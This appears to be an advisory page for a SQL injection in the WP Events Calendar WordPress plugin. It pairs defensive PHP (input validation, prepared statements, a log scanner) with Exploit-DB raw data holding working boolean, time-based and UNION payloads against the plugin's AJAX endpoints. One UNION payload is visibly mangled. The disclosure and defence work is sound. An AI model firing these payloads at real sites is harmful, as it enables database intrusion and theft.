Vendor: WP Events Calendar Plugin
By: Özkan Mustafa Akkuş (AkkuS)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: WP Events Calendar Plugin
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:wachipi:wp_events_calendar_plugin
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
Year: 2018

WordPress Plugin Events Calendar – SQL Injection

An attacker can perform attacks via the calendar AJAX queries. However, this plugin is fully PHP-enabled. SQL queries can be run through the 'month' and 'year' parameters. These parameters are also suitable for XSS attacks. All PHP queries that use these parameters have the same vulnerability.

Mitigation:

Validate and sanitize all user input (here, the numeric calendar parameters should be accepted only as integers), and use prepared statements with bound parameters rather than string concatenation to prevent SQL injection.
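The following is an added example and is not the plugin's own code: it shows the vulnerable pattern the advisory describes (query-string values concatenated straight into SQL) next to a hardened handler for the same `year`, `month`, `day`, `calendar_id` and `pag` parameters. The table and column names (`wp_events`, `start_date`, `title`) are assumptions for illustration; the plugin's real schema is not on this page.

```php
<?php
// Added example, not the plugin's code. Assumed schema: table wp_events with
// columns id, title, start_date, calendar_id.

// Accept each calendar parameter only as a bounded integer. A value such as
// "5' AND SLEEP(5) AND 'a'='a" fails FILTER_VALIDATE_INT and is rejected.
function validate_calendar_params(array $get): ?array
{
    $rules = [
        'year'        => [1970, 2100],
        'month'       => [1, 12],
        'day'         => [1, 31],
        'calendar_id' => [1, PHP_INT_MAX],
        'pag'         => [1, PHP_INT_MAX],
    ];
    $clean = [];
    foreach ($rules as $name => [$min, $max]) {
        $int = filter_var($get[$name] ?? null, FILTER_VALIDATE_INT, [
            'options' => ['min_range' => $min, 'max_range' => $max],
        ]);
        if ($int === false) {
            return null; // any non-integer or out-of-range value rejects the request
        }
        $clean[$name] = $int;
    }
    return $clean;
}

// Vulnerable pattern, shown for contrast: raw request values inside the SQL text.
// A single quote in month or year ends the literal and the rest is parsed as SQL.
function build_query_unsafe(array $get): string
{
    return "SELECT id, title, start_date FROM wp_events"
         . " WHERE calendar_id = '{$get['calendar_id']}'"
         . " AND YEAR(start_date) = '{$get['year']}'"
         . " AND MONTH(start_date) = '{$get['month']}'";
}

// Hardened pattern: validated integers bound to placeholders, never concatenated.
// Inside WordPress the equivalent is $wpdb->prepare() with %d placeholders.
function fetch_events(PDO $db, array $clean): array
{
    $perPage = 20;
    $stmt = $db->prepare(
        'SELECT id, title, start_date FROM wp_events
          WHERE calendar_id = :cid
            AND YEAR(start_date) = :year
            AND MONTH(start_date) = :month
          ORDER BY start_date
          LIMIT :limit OFFSET :offset'
    );
    $stmt->bindValue(':cid',    $clean['calendar_id'], PDO::PARAM_INT);
    $stmt->bindValue(':year',   $clean['year'],        PDO::PARAM_INT);
    $stmt->bindValue(':month',  $clean['month'],       PDO::PARAM_INT);
    $stmt->bindValue(':limit',  $perPage,              PDO::PARAM_INT);
    $stmt->bindValue(':offset', ($clean['pag'] - 1) * $perPage, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Handler body: validate, query with bound parameters, escape on output.
// Output escaping matters too, since the advisory reports the same parameters as XSS sinks.
function handle_get_events_list(array $get, PDO $db): string
{
    $clean = validate_calendar_params($get);
    if ($clean === null) {
        http_response_code(400);
        return json_encode(['error' => 'invalid calendar parameters']);
    }
    $rows = fetch_events($db, $clean);
    $escaped = array_map(
        fn(array $row) => array_map(
            fn($v) => htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8'),
            $row
        ),
        $rows
    );
    return json_encode($escaped);
}

// Usage (the PDO connection details are assumptions):
// $db = new PDO('mysql:host=localhost;dbname=wordpress;charset=utf8mb4', 'user', 'pass',
//               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// header('Content-Type: application/json');
// echo handle_get_events_list($_GET, $db);
```

The two defences are independent: the integer validation alone stops every payload listed on this page, and the bound parameters alone would stop them as well; keeping both means a later change to one query (say, a free-text search field) does not silently reopen the hole.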

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Events Calendar - SQL Injection
# Dork: N/A
# Date: 2018-05-27
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: Wachipi
# Vendor Homepage: https://codecanyon.net/item/wp-events-calendar-plugin/5025660
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : An attacker can perform attacks via calendar ajax queries.
# However, this plugin is fully PHP-enabled. You can run SQL query with
# "month" and "year" parameters.
# These parameters are also suitable for XSS attacks.
# All PHP queries for which these parameters work have the same vulnerable.

# "getBookingForm.php, getMonthCalendar.php, getEventsList.php"
# Demo : http://www.checkingarea.com/EVENTS_WP/
# PoC : SQLi :
# GET
/EVENTS_WP/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1
# Parameter: month (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: 
year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&day=1&calendar_id=1&pag=1

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&day=1&calendar_id=1&pag=1

# Type: UNION query
# Title: MySQL UNION query (NULL) - 29 columns
# Payload: 
year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT&day=1&calendar_id=1&pag=1(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1

# Parameter: year (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: 
year=-8454' OR 7997=7997#&month=5&day=1&calendar_id=1&pag=1

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
year=2018' AND SLEEP(5)-- uTJs&month=5&day=1&calendar_id=1&pag=1

# Type: UNION query
# Title: MySQL UNION query (NULL) - 29 columns
# Payload: 
year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&day=1&calendar_id=1&pag=1
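A defender-side companion to the payloads above, added here and not part of the advisory: a small access-log check that flags requests to the three AJAX endpoints named in the advisory (`getBookingForm.php`, `getMonthCalendar.php`, `getEventsList.php`) whenever one of the numeric parameters is not a plain integer. The log lines at the bottom are constructed for illustration; the second one carries the URL-encoded form of the time-based payload shown above.

```php
<?php
// Added example, not from the advisory. Scans Common Log Format lines and
// reports requests to the plugin's ajax endpoints with non-integer parameters.

const PLUGIN_PATH   = '/wp-content/plugins/wp-events-calendar/';
const ENDPOINTS     = ['getBookingForm.php', 'getMonthCalendar.php', 'getEventsList.php'];
const NUMERIC_PARAMS = ['year', 'month', 'day', 'calendar_id', 'pag'];

// Returns null for lines that are not of interest, otherwise a finding with
// the request URL and the parameters whose values are not pure digits.
function analyze_request_line(string $line): ?array
{
    // Request part of a CLF line: "GET /path?query HTTP/1.1"
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $url  = $m[1];
    $path = parse_url($url, PHP_URL_PATH);
    if (!is_string($path)
        || strpos($path, PLUGIN_PATH) === false
        || !in_array(basename($path), ENDPOINTS, true)) {
        return null;
    }
    $query = parse_url($url, PHP_URL_QUERY);
    parse_str(is_string($query) ? $query : '', $params); // parse_str URL-decodes values
    $suspicious = [];
    foreach (NUMERIC_PARAMS as $name) {
        if (isset($params[$name]) && !ctype_digit((string) $params[$name])) {
            $suspicious[$name] = $params[$name];
        }
    }
    return $suspicious ? ['url' => $url, 'suspicious' => $suspicious] : null;
}

// Runs the check over a log file (or any iterable of lines) and returns findings.
function scan_log(iterable $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $f = analyze_request_line($line);
        if ($f !== null) {
            $findings[] = $f;
        }
    }
    return $findings;
}

// Constructed sample lines: a legitimate calendar request, the time-based
// payload from the advisory in its URL-encoded form, and an unrelated request.
$sampleLog = [
    '203.0.113.7 - - [27/May/2018:10:15:01 +0000] "GET /wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1 HTTP/1.1" 200 1842',
    '203.0.113.7 - - [27/May/2018:10:15:09 +0000] "GET /wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5%27%20AND%20SLEEP(5)%20AND%20%27MmZz%27%3D%27MmZz&day=1&calendar_id=1&pag=1 HTTP/1.1" 200 1842',
    '198.51.100.4 - - [27/May/2018:10:16:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4021',
];

foreach (scan_log($sampleLog) as $finding) {
    echo "suspicious request: {$finding['url']}\n";
    foreach ($finding['suspicious'] as $name => $value) {
        echo "  $name = " . json_encode($value) . "\n";
    }
}
```

Because the check is on the shape of the value (digits only) rather than on SQL keywords, it catches the boolean, time-based and UNION variants above with the same rule and does not depend on a signature list; a response-time spike on the same endpoint is the natural second signal for the `SLEEP(5)` variant.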